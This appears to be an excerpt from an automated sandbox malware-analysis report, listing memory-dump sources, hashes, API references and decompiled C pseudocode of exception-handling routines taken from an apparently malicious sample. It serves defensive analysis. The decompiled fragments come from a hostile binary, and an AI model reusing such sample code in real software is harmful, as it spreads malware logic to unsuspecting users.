                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2221118986-0
                                                                                                                                  • Opcode ID: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
                                                                                                                                  • Instruction ID: c94585d52e11e13e52c481019c477d087ede4e5eb7caaf4ee76ade4d5c2903af
                                                                                                                                  • Opcode Fuzzy Hash: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
                                                                                                                                  • Instruction Fuzzy Hash: DC22857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022BB1E5(long _a4) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				short* _v32;
                                                                                                                                  				void _v36;
                                                                                                                                  				void* _t57;
                                                                                                                                  				signed int _t58;
                                                                                                                                  				signed int _t61;
                                                                                                                                  				signed int _t62;
                                                                                                                                  				void* _t63;
                                                                                                                                  				signed int* _t68;
                                                                                                                                  				intOrPtr* _t69;
                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                  				intOrPtr _t72;
                                                                                                                                  				intOrPtr _t75;
                                                                                                                                  				void* _t76;
                                                                                                                                  				signed int _t77;
                                                                                                                                  				void* _t78;
                                                                                                                                  				void _t80;
                                                                                                                                  				signed int _t81;
                                                                                                                                  				signed int _t84;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				short* _t87;
                                                                                                                                  				void* _t89;
                                                                                                                                  				signed int* _t90;
                                                                                                                                  				long _t91;
                                                                                                                                  				signed int _t93;
                                                                                                                                  				signed int _t94;
                                                                                                                                  				signed int _t100;
                                                                                                                                  				signed int _t102;
                                                                                                                                  				void* _t104;
                                                                                                                                  				long _t108;
                                                                                                                                  				signed int _t110;
                                                                                                                                  
                                                                                                                                  				_t108 = _a4;
                                                                                                                                  				_t76 =  *(_t108 + 8);
                                                                                                                                  				if((_t76 & 0x00000003) != 0) {
                                                                                                                                  					L3:
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_a4 =  *[fs:0x4];
                                                                                                                                  				_v8 =  *[fs:0x8];
                                                                                                                                  				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                  					_t102 =  *(_t108 + 0xc);
                                                                                                                                  					__eflags = _t102 - 0xffffffff;
                                                                                                                                  					if(_t102 != 0xffffffff) {
                                                                                                                                  						_t91 = 0;
                                                                                                                                  						__eflags = 0;
                                                                                                                                  						_a4 = 0;
                                                                                                                                  						_t57 = _t76;
                                                                                                                                  						do {
                                                                                                                                  							_t80 =  *_t57;
                                                                                                                                  							__eflags = _t80 - 0xffffffff;
                                                                                                                                  							if(_t80 == 0xffffffff) {
                                                                                                                                  								goto L9;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t80 - _t91;
                                                                                                                                  							if(_t80 >= _t91) {
                                                                                                                                  								L20:
                                                                                                                                  								_t63 = 0;
                                                                                                                                  								L60:
                                                                                                                                  								return _t63;
                                                                                                                                  							}
                                                                                                                                  							L9:
                                                                                                                                  							__eflags =  *(_t57 + 4);
                                                                                                                                  							if( *(_t57 + 4) != 0) {
                                                                                                                                  								_t12 =  &_a4;
                                                                                                                                  								 *_t12 = _a4 + 1;
                                                                                                                                  								__eflags =  *_t12;
                                                                                                                                  							}
                                                                                                                                  							_t91 = _t91 + 1;
                                                                                                                                  							_t57 = _t57 + 0xc;
                                                                                                                                  							__eflags = _t91 - _t102;
                                                                                                                                  						} while (_t91 <= _t102);
                                                                                                                                  						__eflags = _a4;
                                                                                                                                  						if(_a4 == 0) {
                                                                                                                                  							L15:
                                                                                                                                  							_t81 =  *0x22bd2e0; // 0x0
                                                                                                                                  							_t110 = _t76 & 0xfffff000;
                                                                                                                                  							_t58 = 0;
                                                                                                                                  							__eflags = _t81;
                                                                                                                                  							if(_t81 <= 0) {
                                                                                                                                  								L18:
                                                                                                                                  								_t104 = _t102 | 0xffffffff;
                                                                                                                                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                  								__eflags = _t61;
                                                                                                                                  								if(_t61 < 0) {
                                                                                                                                  									_t62 = 0;
                                                                                                                                  									__eflags = 0;
                                                                                                                                  								} else {
                                                                                                                                  									_t62 = _a4;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t62;
                                                                                                                                  								if(_t62 == 0) {
                                                                                                                                  									L59:
                                                                                                                                  									_t63 = _t104;
                                                                                                                                  									goto L60;
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _v12 - 0x1000000;
                                                                                                                                  									if(_v12 != 0x1000000) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _v16 & 0x000000cc;
                                                                                                                                  									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                  										L46:
                                                                                                                                  										_t63 = 1;
                                                                                                                                  										 *0x22bd328 = 1;
                                                                                                                                  										__eflags =  *0x22bd328;
                                                                                                                                  										if( *0x22bd328 != 0) {
                                                                                                                                  											goto L60;
                                                                                                                                  										}
                                                                                                                                  										_t84 =  *0x22bd2e0; // 0x0
                                                                                                                                  										__eflags = _t84;
                                                                                                                                  										_t93 = _t84;
                                                                                                                                  										if(_t84 <= 0) {
                                                                                                                                  											L51:
                                                                                                                                  											__eflags = _t93;
                                                                                                                                  											if(_t93 != 0) {
                                                                                                                                  												L58:
                                                                                                                                  												 *0x22bd328 = 0;
                                                                                                                                  												goto L5;
                                                                                                                                  											}
                                                                                                                                  											_t77 = 0xf;
                                                                                                                                  											__eflags = _t84 - _t77;
                                                                                                                                  											if(_t84 <= _t77) {
                                                                                                                                  												_t77 = _t84;
                                                                                                                                  											}
                                                                                                                                  											_t94 = 0;
                                                                                                                                  											__eflags = _t77;
                                                                                                                                  											if(_t77 < 0) {
                                                                                                                                  												L56:
                                                                                                                                  												__eflags = _t84 - 0x10;
                                                                                                                                  												if(_t84 < 0x10) {
                                                                                                                                  													_t86 = _t84 + 1;
                                                                                                                                  													__eflags = _t86;
                                                                                                                                  													 *0x22bd2e0 = _t86;
                                                                                                                                  												}
                                                                                                                                  												goto L58;
                                                                                                                                  											} else {
                                                                                                                                  												do {
                                                                                                                                  													_t68 = 0x22bd2e8 + _t94 * 4;
                                                                                                                                  													_t94 = _t94 + 1;
                                                                                                                                  													__eflags = _t94 - _t77;
                                                                                                                                  													 *_t68 = _t110;
                                                                                                                                  													_t110 =  *_t68;
                                                                                                                                  												} while (_t94 <= _t77);
                                                                                                                                  												goto L56;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										_t69 = 0x22bd2e4 + _t84 * 4;
                                                                                                                                  										while(1) {
                                                                                                                                  											__eflags =  *_t69 - _t110;
                                                                                                                                  											if( *_t69 == _t110) {
                                                                                                                                  												goto L51;
                                                                                                                                  											}
                                                                                                                                  											_t93 = _t93 - 1;
                                                                                                                                  											_t69 = _t69 - 4;
                                                                                                                                  											__eflags = _t93;
                                                                                                                                  											if(_t93 > 0) {
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											goto L51;
                                                                                                                                  										}
                                                                                                                                  										goto L51;
                                                                                                                                  									}
                                                                                                                                  									_t87 = _v32;
                                                                                                                                  									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                  									if( *_t87 != 0x5a4d) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                  									__eflags =  *_t71 - 0x4550;
                                                                                                                                  									if( *_t71 != 0x4550) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									_t78 = _t76 - _t87;
                                                                                                                                  									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                  									__eflags = _t78 - _t72;
                                                                                                                                  									if(_t78 < _t72) {
                                                                                                                                  										goto L46;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                  										goto L46;
                                                                                                                                  									}
                                                                                                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                  										goto L20;
                                                                                                                                  									}
                                                                                                                                  									goto L46;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								goto L16;
                                                                                                                                  							}
                                                                                                                                  							while(1) {
                                                                                                                                  								L16:
                                                                                                                                  								__eflags =  *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) - _t110;
                                                                                                                                  								if( *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) == _t110) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t58 = _t58 + 1;
                                                                                                                                  								__eflags = _t58 - _t81;
                                                                                                                                  								if(_t58 < _t81) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								goto L18;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t58;
                                                                                                                                  							if(_t58 <= 0) {
                                                                                                                                  								goto L5;
                                                                                                                                  							}
                                                                                                                                  							 *0x22bd328 = 1;
                                                                                                                                  							__eflags =  *0x22bd328;
                                                                                                                                  							if( *0x22bd328 != 0) {
                                                                                                                                  								goto L5;
                                                                                                                                  							}
                                                                                                                                  							__eflags =  *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) - _t110;
                                                                                                                                  							if( *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) == _t110) {
                                                                                                                                  								L32:
                                                                                                                                  								_t100 = 0;
                                                                                                                                  								__eflags = _t58;
                                                                                                                                  								if(_t58 < 0) {
                                                                                                                                  									L34:
                                                                                                                                  									 *0x22bd328 = 0;
                                                                                                                                  									goto L5;
                                                                                                                                  								} else {
                                                                                                                                  									goto L33;
                                                                                                                                  								}
                                                                                                                                  								do {
                                                                                                                                  									L33:
                                                                                                                                  									_t90 = 0x22bd2e8 + _t100 * 4;
                                                                                                                                  									_t100 = _t100 + 1;
                                                                                                                                  									__eflags = _t100 - _t58;
                                                                                                                                  									 *_t90 = _t110;
                                                                                                                                  									_t110 =  *_t90;
                                                                                                                                  								} while (_t100 <= _t58);
                                                                                                                                  								goto L34;
                                                                                                                                  							}
                                                                                                                                  							_t25 = _t81 - 1; // -1
                                                                                                                                  							_t58 = _t25;
                                                                                                                                  							__eflags = _t58;
                                                                                                                                  							if(_t58 < 0) {
                                                                                                                                  								L28:
                                                                                                                                  								__eflags = _t81 - 0x10;
                                                                                                                                  								if(_t81 < 0x10) {
                                                                                                                                  									_t81 = _t81 + 1;
                                                                                                                                  									__eflags = _t81;
                                                                                                                                  									 *0x22bd2e0 = _t81;
                                                                                                                                  								}
                                                                                                                                  								_t28 = _t81 - 1; // 0x0
                                                                                                                                  								_t58 = _t28;
                                                                                                                                  								goto L32;
                                                                                                                                  							} else {
                                                                                                                                  								goto L25;
                                                                                                                                  							}
                                                                                                                                  							while(1) {
                                                                                                                                  								L25:
                                                                                                                                  								__eflags =  *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) - _t110;
                                                                                                                                  								if( *((intOrPtr*)(0x22bd2e8 + _t58 * 4)) == _t110) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t58 = _t58 - 1;
                                                                                                                                  								__eflags = _t58;
                                                                                                                                  								if(_t58 >= 0) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t58;
                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                  									goto L34;
                                                                                                                                  								}
                                                                                                                                  								goto L32;
                                                                                                                                  							}
                                                                                                                                  							goto L28;
                                                                                                                                  						}
                                                                                                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                  						__eflags = _t75 - _v8;
                                                                                                                                  						if(_t75 < _v8) {
                                                                                                                                  							goto L20;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t75 - _t108;
                                                                                                                                  						if(_t75 >= _t108) {
                                                                                                                                  							goto L20;
                                                                                                                                  						}
                                                                                                                                  						goto L15;
                                                                                                                                  					}
                                                                                                                                  					L5:
                                                                                                                                  					_t63 = 1;
                                                                                                                                  					goto L60;
                                                                                                                                  				} else {
                                                                                                                                  					goto L3;
                                                                                                                                  				}
                                                                                                                                  			}




































                                                                                                                                  0x022bb31d
                                                                                                                                  0x022bb31f
                                                                                                                                  0x022bb400
                                                                                                                                  0x022bb400
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb325
                                                                                                                                  0x022bb325
                                                                                                                                  0x022bb32c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb332
                                                                                                                                  0x022bb336
                                                                                                                                  0x022bb392
                                                                                                                                  0x022bb394
                                                                                                                                  0x022bb39c
                                                                                                                                  0x022bb39e
                                                                                                                                  0x022bb3a0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb3a2
                                                                                                                                  0x022bb3a8
                                                                                                                                  0x022bb3aa
                                                                                                                                  0x022bb3ac
                                                                                                                                  0x022bb3c1
                                                                                                                                  0x022bb3c1
                                                                                                                                  0x022bb3c3
                                                                                                                                  0x022bb3f2
                                                                                                                                  0x022bb3f9
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb3f9
                                                                                                                                  0x022bb3c7
                                                                                                                                  0x022bb3c8
                                                                                                                                  0x022bb3ca
                                                                                                                                  0x022bb3cc
                                                                                                                                  0x022bb3cc
                                                                                                                                  0x022bb3ce
                                                                                                                                  0x022bb3d0
                                                                                                                                  0x022bb3d2
                                                                                                                                  0x022bb3e6
                                                                                                                                  0x022bb3e6
                                                                                                                                  0x022bb3e9
                                                                                                                                  0x022bb3eb
                                                                                                                                  0x022bb3eb
                                                                                                                                  0x022bb3ec
                                                                                                                                  0x022bb3ec
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb3d4
                                                                                                                                  0x022bb3d4
                                                                                                                                  0x022bb3d4
                                                                                                                                  0x022bb3dd
                                                                                                                                  0x022bb3de
                                                                                                                                  0x022bb3e0
                                                                                                                                  0x022bb3e2
                                                                                                                                  0x022bb3e2
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb3d4
                                                                                                                                  0x022bb3d2
                                                                                                                                  0x022bb3ae
                                                                                                                                  0x022bb3b5
                                                                                                                                  0x022bb3b5
                                                                                                                                  0x022bb3b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb3b9
                                                                                                                                  0x022bb3ba
                                                                                                                                  0x022bb3bd
                                                                                                                                  0x022bb3bf
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb3bf
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb3b5
                                                                                                                                  0x022bb338
                                                                                                                                  0x022bb33b
                                                                                                                                  0x022bb340
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb349
                                                                                                                                  0x022bb34b
                                                                                                                                  0x022bb351
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb357
                                                                                                                                  0x022bb35d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb363
                                                                                                                                  0x022bb365
                                                                                                                                  0x022bb36e
                                                                                                                                  0x022bb372
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb378
                                                                                                                                  0x022bb37b
                                                                                                                                  0x022bb37d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb384
                                                                                                                                  0x022bb386
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb388
                                                                                                                                  0x022bb38c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb38c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb277
                                                                                                                                  0x022bb277
                                                                                                                                  0x022bb277
                                                                                                                                  0x022bb27e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb280
                                                                                                                                  0x022bb281
                                                                                                                                  0x022bb283
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb283
                                                                                                                                  0x022bb2ab
                                                                                                                                  0x022bb2ad
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb2bd
                                                                                                                                  0x022bb2bf
                                                                                                                                  0x022bb2c1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb2c7
                                                                                                                                  0x022bb2ce
                                                                                                                                  0x022bb2fa
                                                                                                                                  0x022bb2fa
                                                                                                                                  0x022bb2fc
                                                                                                                                  0x022bb2fe
                                                                                                                                  0x022bb312
                                                                                                                                  0x022bb314
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb300
                                                                                                                                  0x022bb300
                                                                                                                                  0x022bb300
                                                                                                                                  0x022bb309
                                                                                                                                  0x022bb30a
                                                                                                                                  0x022bb30c
                                                                                                                                  0x022bb30e
                                                                                                                                  0x022bb30e
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb300
                                                                                                                                  0x022bb2d0
                                                                                                                                  0x022bb2d0
                                                                                                                                  0x022bb2d3
                                                                                                                                  0x022bb2d5
                                                                                                                                  0x022bb2e7
                                                                                                                                  0x022bb2e7
                                                                                                                                  0x022bb2ea
                                                                                                                                  0x022bb2ec
                                                                                                                                  0x022bb2ec
                                                                                                                                  0x022bb2ed
                                                                                                                                  0x022bb2ed
                                                                                                                                  0x022bb2f3
                                                                                                                                  0x022bb2f3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb2d7
                                                                                                                                  0x022bb2d7
                                                                                                                                  0x022bb2d7
                                                                                                                                  0x022bb2de
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb2e0
                                                                                                                                  0x022bb2e0
                                                                                                                                  0x022bb2e1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb2e1
                                                                                                                                  0x022bb2e3
                                                                                                                                  0x022bb2e5
                                                                                                                                  0x022bb2f8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb2f8
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb2e5
                                                                                                                                  0x022bb257
                                                                                                                                  0x022bb25a
                                                                                                                                  0x022bb25d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb25f
                                                                                                                                  0x022bb261
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x022bb261
                                                                                                                                  0x022bb226
                                                                                                                                  0x022bb228
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 022BB296
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryQueryVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2850889275-0
                                                                                                                                  • Opcode ID: b74a2d9c406393e1e8257f2d7cd2f1ad11519d93504d2e6cdee49dc01988b68c
                                                                                                                                  • Instruction ID: 31e44c4a3e2860410392f3436c4f44be36f0418f670ba980d8738ab0a5a9a849
                                                                                                                                  • Opcode Fuzzy Hash: b74a2d9c406393e1e8257f2d7cd2f1ad11519d93504d2e6cdee49dc01988b68c
                                                                                                                                  • Instruction Fuzzy Hash: E761B731E206068FDB1BCAE9D8947ED73A5EF853DCF248529DC55CB189E7B0D842C640
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                  			E022BAFC0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				void* __ebp;
                                                                                                                                  				signed int* _t43;
                                                                                                                                  				char _t44;
                                                                                                                                  				void* _t46;
                                                                                                                                  				void* _t49;
                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                  				void* _t54;
                                                                                                                                  				void* _t65;
                                                                                                                                  				long _t66;
                                                                                                                                  				signed int* _t80;
                                                                                                                                  				signed int* _t82;
                                                                                                                                  				void* _t84;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				void* _t89;
                                                                                                                                  				void* _t95;
                                                                                                                                  				void* _t96;
                                                                                                                                  				void* _t99;
                                                                                                                                  				void* _t106;
                                                                                                                                  
                                                                                                                                  				_t43 = _t84;
                                                                                                                                  				_t65 = __ebx + 2;
                                                                                                                                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                  				_t89 = _t95;
                                                                                                                                  				_t96 = _t95 - 8;
                                                                                                                                  				_push(_t65);
                                                                                                                                  				_push(_t84);
                                                                                                                                  				_push(_t89);
                                                                                                                                  				asm("cld");
                                                                                                                                  				_t66 = _a8;
                                                                                                                                  				_t44 = _a4;
                                                                                                                                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                  					_push(_t89);
                                                                                                                                  					E022BB12B(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                  					_t46 = 1;
                                                                                                                                  				} else {
                                                                                                                                  					_v12 = _t44;
                                                                                                                                  					_v8 = _a12;
                                                                                                                                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                  					_t86 =  *(_t66 + 0xc);
                                                                                                                                  					_t80 =  *(_t66 + 8);
                                                                                                                                  					_t49 = E022BB1E5(_t66);
                                                                                                                                  					_t99 = _t96 + 4;
                                                                                                                                  					if(_t49 == 0) {
                                                                                                                                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                  						goto L11;
                                                                                                                                  					} else {
                                                                                                                                  						while(_t86 != 0xffffffff) {
                                                                                                                                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                  							if(_t53 == 0) {
                                                                                                                                  								L8:
                                                                                                                                  								_t80 =  *(_t66 + 8);
                                                                                                                                  								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								_t54 =  *_t53();
                                                                                                                                  								_t89 = _t89;
                                                                                                                                  								_t86 = _t86;
                                                                                                                                  								_t66 = _a8;
                                                                                                                                  								_t55 = _t54;
                                                                                                                                  								_t106 = _t54;
                                                                                                                                  								if(_t106 == 0) {
                                                                                                                                  									goto L8;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t106 < 0) {
                                                                                                                                  										_t46 = 0;
                                                                                                                                  									} else {
                                                                                                                                  										_t82 =  *(_t66 + 8);
                                                                                                                                  										E022BB0D0(_t55, _t66);
                                                                                                                                  										_t89 = _t66 + 0x10;
                                                                                                                                  										E022BB12B(_t89, _t66, 0);
                                                                                                                                  										_t99 = _t99 + 0xc;
                                                                                                                                  										E022BB1C7(_t82[2]);
                                                                                                                                  										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                  										_t66 = 0;
                                                                                                                                  										_t86 = 0;
                                                                                                                                  										 *(_t82[2])(1);
                                                                                                                                  										goto L8;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						L11:
                                                                                                                                  						_t46 = 1;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				L13:
                                                                                                                                  				return _t46;
                                                                                                                                  			}


                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                  • Instruction ID: c13fb89002d9886db233e320ec8ffc999839342454ad89dc79ec9cabc1696fa5
                                                                                                                                  • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                                                                                                                  • Instruction Fuzzy Hash: 1221A4369102059BCB11EFA9C8809F7BBA5FF48394B058568DD658B249D730FA15CBE0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 00421722
                                                                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 00421943
                                                                                                                                    • Part of subcall function 00418B80: __invoke_watson.LIBCMTD ref: 00418BA1
                                                                                                                                  • _wcscat_s.LIBCMTD ref: 0042193A
                                                                                                                                    • Part of subcall function 00426420: __invalid_parameter.LIBCMTD ref: 00426492
                                                                                                                                  • _wcscat_s.LIBCMTD ref: 00421972
                                                                                                                                    • Part of subcall function 00426420: _memset.LIBCMT ref: 004264FB
                                                                                                                                    • Part of subcall function 00426420: __invalid_parameter.LIBCMTD ref: 00426557
                                                                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 0042197B
                                                                                                                                  • __snwprintf_s.LIBCMTD ref: 004219D4
                                                                                                                                    • Part of subcall function 0041FCA0: __vsnprintf_s_l.LIBCMTD ref: 0041FCC2
                                                                                                                                  • __invoke_watson_if_oneof.LIBCMTD ref: 00421A0D
                                                                                                                                  • _wcscpy_s.LIBCMTD ref: 00421A52
                                                                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 00421A5B
                                                                                                                                  • __invoke_watson_if_oneof.LIBCMTD ref: 00421AFE
                                                                                                                                  • _wcscpy_s.LIBCMTD ref: 00421B36
                                                                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 00421B3F
                                                                                                                                  • __itow_s.LIBCMTD ref: 00421719
                                                                                                                                    • Part of subcall function 00426800: _xtow_s@20.LIBCMTD ref: 0042682B
                                                                                                                                  • __strftime_l.LIBCMTD ref: 004217D9
                                                                                                                                  • __invoke_watson_if_oneof.LIBCMTD ref: 00421812
                                                                                                                                  • _wcscpy_s.LIBCMTD ref: 00421857
                                                                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 00421860
                                                                                                                                  • _wcscpy_s.LIBCMTD ref: 004218B3
                                                                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 004218BC
                                                                                                                                  • __invoke_watson_if_error.LIBCMTD ref: 004218F6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __invoke_watson_if_error$_wcscpy_s$__invoke_watson_if_oneof$__invalid_parameter_wcscat_s$__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset_xtow_s@20
                                                                                                                                  • String ID: P.K$h N@$hxH@
                                                                                                                                  • API String ID: 2137535789-2079250698
